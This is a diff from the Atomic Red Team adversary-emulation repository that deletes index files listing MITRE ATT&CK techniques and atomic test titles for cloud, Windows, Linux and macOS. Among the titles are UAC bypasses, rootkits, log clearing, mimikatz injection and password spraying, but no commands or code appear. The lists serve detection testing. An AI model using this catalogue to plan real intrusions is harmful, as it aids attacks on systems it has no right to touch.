- T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
# lateral-movement
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
atomics/Indexes/Indexes-Markdown/iaas-index.md
-132
View File
@@ -1,132 +0,0 @@
# IaaS Atomic Tests by ATT&CK Tactic & Technique
# defense-evasion
- T1578.004 Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1536 Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.001 Impair Defenses: Disable or Modify Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.008 Impair Defenses: Disable Cloud Logs](../../T1562.008/T1562.008.md)
- Atomic Test #1: AWS - CloudTrail Changes [iaas:aws]
- Atomic Test #2: Azure - Eventhub Deletion [iaas:azure]
- Atomic Test #7: AWS - CloudWatch Log Group Deletes [iaas:aws]
- Atomic Test #8: AWS - CloudWatch Log Stream Deletes [iaas:aws]
- Atomic Test #9: AWS CloudWatch Log Stream Deletes [iaas:aws]
- T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578.001 Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
# credential-access
- T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.005 Unsecured Credentials: Cloud Instance Metadata API](../../T1552.005/T1552.005.md)
- Atomic Test #2: Azure - Dump Azure Instance Metadata from Virtual Machines [iaas:azure]
- T1522 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606.002 Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1040 Network Sniffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.003 Brute Force: Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #9: AWS - Password Spray an AWS using GoAWSConsoleSpray [iaas:aws]
- T1552.001 Unsecured Credentials: Credentials In Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.004 Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1081 Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1496 Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1485 Data Destruction [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# discovery
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1040 Network Sniffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1082 System Information Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1580 Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1049 System Network Connections Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1619 Cloud Storage Object Discovery](../../T1619/T1619.md)
- Atomic Test #1: AWS S3 Enumeration [iaas:azure]
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1201 Password Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518.001 Software Discovery: Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1526 Cloud Service Discovery](../../T1526/T1526.md)
- Atomic Test #1: Azure - Dump Subscription Data with MicroBurst [iaas:azure]
- T1046 Network Service Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
- T1098.003 Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1525 Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.004 SSH Authorized Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.001 Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md)
- Atomic Test #3: AWS - Create Access Key and Secret Key [iaas:aws]
- [T1136.003 Create Account: Cloud Account](../../T1136.003/T1136.003.md)
- Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
- Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure]
- Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
# collection
- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1530 Data from Cloud Storage Object](../../T1530/T1530.md)
- Atomic Test #1: Azure - Enumerate Azure Blobs with MicroBurst [iaas:azure]
- Atomic Test #2: Azure - Scan for Anonymous Access to Azure Storage (Powershell) [iaas:azure]
- Atomic Test #3: AWS - Scan for Anonymous Access to S3 [iaas:aws]
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# initial-access
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
# lateral-movement
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
# execution
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.003 Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# exfiltration
- T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
atomics/Indexes/Indexes-Markdown/index.md
-2430
View File
@@ -1,2430 +0,0 @@
# All Atomic Tests by ATT&CK Tactic & Technique
# defense-evasion
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.011 Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md)
- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
- Atomic Test #2: Rundll32 execute VBscript command [windows]
- Atomic Test #3: Rundll32 execute VBscript command using Ordinal number [windows]
- Atomic Test #4: Rundll32 advpack.dll Execution [windows]
- Atomic Test #5: Rundll32 ieadvpack.dll Execution [windows]
- Atomic Test #6: Rundll32 syssetup.dll Execution [windows]
- Atomic Test #7: Rundll32 setupapi.dll Execution [windows]
- Atomic Test #8: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows]
- Atomic Test #9: Launches an executable using Rundll32 and pcwutl.dll [windows]
- Atomic Test #10: Execution of non-dll using rundll32.exe [windows]
- Atomic Test #11: Rundll32 with Ordinal Value [windows]
- Atomic Test #12: Rundll32 with Control_RunDLL [windows]
- Atomic Test #13: Rundll32 with desk.cpl [windows]
- T1143 Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- T1578.004 Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1148 HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [macos, linux]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [macos, linux]
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [macos, linux]
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [macos, linux]
- Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
- Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
- Atomic Test #7: chown - Change file or folder mode ownership only [macos, linux]
- Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- Atomic Test #10: Chmod through c script [macos, linux]
- Atomic Test #11: Chown through c script [macos, linux]
- [T1216.001 Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1006 Direct Volume Access](../../T1006/T1006.md)
- Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows]
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #3: dynamic-linker based rootkit (libprocesshider) [linux]
- Atomic Test #4: Loadable Kernel Module based Rootkit (Diamorphine) [linux]
- T1109 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.007 Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
- Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- Atomic Test #10: UACME Bypass Method 23 [windows]
- Atomic Test #11: UACME Bypass Method 31 [windows]
- Atomic Test #12: UACME Bypass Method 33 [windows]
- Atomic Test #13: UACME Bypass Method 34 [windows]
- Atomic Test #14: UACME Bypass Method 39 [windows]
- Atomic Test #15: UACME Bypass Method 56 [windows]
- Atomic Test #16: UACME Bypass Method 59 [windows]
- Atomic Test #17: UACME Bypass Method 61 [windows]
- Atomic Test #18: WinPwn - UAC Magic [windows]
- Atomic Test #19: WinPwn - UAC Bypass ccmstp technique [windows]
- Atomic Test #20: WinPwn - UAC Bypass DiskCleanup technique [windows]
- Atomic Test #21: WinPwn - UAC Bypass DccwBypassUAC technique [windows]
- Atomic Test #22: Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key [windows]
- Atomic Test #23: UAC Bypass with WSReset Registry Modification [windows]
- T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1116 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218.013 Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1093 Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- Atomic Test #2: Masquerade as a built-in system executable [windows]
- T1600 Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1121 Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564 Hide Artifacts](../../T1564/T1564.md)
- Atomic Test #1: Extract binary files via VBA [windows]
- Atomic Test #2: Create a Hidden User Called "$" [windows]
- Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows]
- Atomic Test #4: Create and Hide a Service with sc.exe [windows]
- [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
- Atomic Test #1: Add Federation to Azure AD [azure-ad]
- T1527 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.009 Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
- Atomic Test #4: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
- [T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- Atomic Test #1: rm -rf [macos, linux]
- Atomic Test #2: Overwrite Linux Mail Spool [linux]
- Atomic Test #3: Overwrite Linux Log [linux]
- [T1218.004 Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md)
- Atomic Test #1: CheckIfInstallable method call [windows]
- Atomic Test #2: InstallHelper method call [windows]
- Atomic Test #3: InstallUtil class constructor method call [windows]
- Atomic Test #4: InstallUtil Install method call [windows]
- Atomic Test #5: InstallUtil Uninstall method call - /U variant [windows]
- Atomic Test #6: InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant [windows]
- Atomic Test #7: InstallUtil HelpText method call [windows]
- Atomic Test #8: InstallUtil evasive invocation [windows]
- T1089 Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- [T1553.001 Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md)
- Atomic Test #1: Gatekeeper Bypass [macos]
- T1553.002 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md)
- Atomic Test #1: Take ownership using takeown utility [windows]
- Atomic Test #2: cacls - Grant permission to specified user or group recursively [windows]
- Atomic Test #3: attrib - Remove read-only attribute [windows]
- Atomic Test #4: attrib - hide file [windows]
- Atomic Test #5: Grant Full Access to folder for Everyone - Ryuk Ransomware Style [windows]
- [T1218.007 Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md)
- Atomic Test #1: Msiexec.exe - Execute Local MSI file with embedded JScript [windows]
- Atomic Test #2: Msiexec.exe - Execute Local MSI file with embedded VBScript [windows]
- Atomic Test #3: Msiexec.exe - Execute Local MSI file with an embedded DLL [windows]
- Atomic Test #4: Msiexec.exe - Execute Local MSI file with an embedded EXE [windows]
- Atomic Test #5: WMI Win32_Product Class - Execute Local MSI file with embedded JScript [windows]
- Atomic Test #6: WMI Win32_Product Class - Execute Local MSI file with embedded VBScript [windows]
- Atomic Test #7: WMI Win32_Product Class - Execute Local MSI file with an embedded DLL [windows]
- Atomic Test #8: WMI Win32_Product Class - Execute Local MSI file with an embedded EXE [windows]
- Atomic Test #9: Msiexec.exe - Execute the DllRegisterServer function of a DLL [windows]
- Atomic Test #10: Msiexec.exe - Execute the DllUnregisterServer function of a DLL [windows]
- Atomic Test #11: Msiexec.exe - Execute Remote MSI file [windows]
- [T1556.002 Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- T1600.001 Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear Bash history (echo) [linux]
- Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
- Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
- Atomic Test #5: Clear Bash history (truncate) [linux]
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
- Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
- Atomic Test #9: Disable Bash History Logging with SSH -T [linux]
- Atomic Test #10: Prevent Powershell History Logging [windows]
- Atomic Test #11: Clear Powershell History by Deleting History File [windows]
- Atomic Test #12: Set Custom AddToHistoryHandler to Avoid History File Logging [windows]
- [T1202 Indirect Command Execution](../../T1202/T1202.md)
- Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
- Atomic Test #2: Indirect Command Execution - forfiles.exe [windows]
- Atomic Test #3: Indirect Command Execution - conhost.exe [windows]
- T1536 Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
- Atomic Test #2: Certutil Rename and Decode [windows]
- Atomic Test #3: Base64 decoding with Python [linux, macos]
- Atomic Test #4: Base64 decoding with Perl [linux, macos]
- Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
- Atomic Test #6: Hex decoding with shell utilities [linux, macos]
- [T1562 Impair Defenses](../../T1562/T1562.md)
- Atomic Test #1: Windows Disable LSA Protection [windows]
- [T1055.003 Thread Execution Hijacking](../../T1055.003/T1055.003.md)
- Atomic Test #1: Thread Execution Hijacking [windows]
- [T1036 Masquerading](../../T1036/T1036.md)
- Atomic Test #1: System File Copied to Unusual Location [windows]
- Atomic Test #2: Malware Masquerading and Execution from Zip File [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Shellcode execution via VBA [windows]
- Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218 Signed Binary Proxy Execution](../../T1218/T1218.md)
- Atomic Test #1: mavinject - Inject DLL into running process [windows]
- Atomic Test #2: Register-CimProvider - Execute evil dll [windows]
- Atomic Test #3: InfDefaultInstall.exe .inf Execution [windows]
- Atomic Test #4: ProtocolHandler.exe Downloaded a Suspicious File [windows]
- Atomic Test #5: Microsoft.Workflow.Compiler.exe Payload Execution [windows]
- Atomic Test #6: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
- Atomic Test #7: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows]
- Atomic Test #8: DiskShadow Command Execution [windows]
- Atomic Test #9: Load Arbitrary DLL via Wuauclt (Windows Update Client) [windows]
- Atomic Test #10: Lolbin Gpscript logon option [windows]
- Atomic Test #11: Lolbin Gpscript startup option [windows]
- Atomic Test #12: Lolbas ie4uinit.exe use as proxy [windows]
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
- Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
- Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
- Atomic Test #8: Windows - Timestomp a File [windows]
- [T1620 Reflective Code Loading](../../T1620/T1620.md)
- Atomic Test #1: WinPwn - Reflectively load Mimik@tz into memory [windows]
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.003 Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
- [T1562.002 Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md)
- Atomic Test #1: Disable Windows IIS HTTP Logging [windows]
- Atomic Test #2: Kill Event Log Service Threads [windows]
- Atomic Test #3: Impair Windows Audit Log Policy [windows]
- Atomic Test #4: Clear Windows Audit Policy Config [windows]
- Atomic Test #5: Disable Event Logging with wevtutil [windows]
- Atomic Test #6: Makes Eventlog blind with Phant0m [windows]
- [T1218.002 Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md)
- Atomic Test #1: Control Panel Items [windows]
- T1599.001 Network Address Translation Traversal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
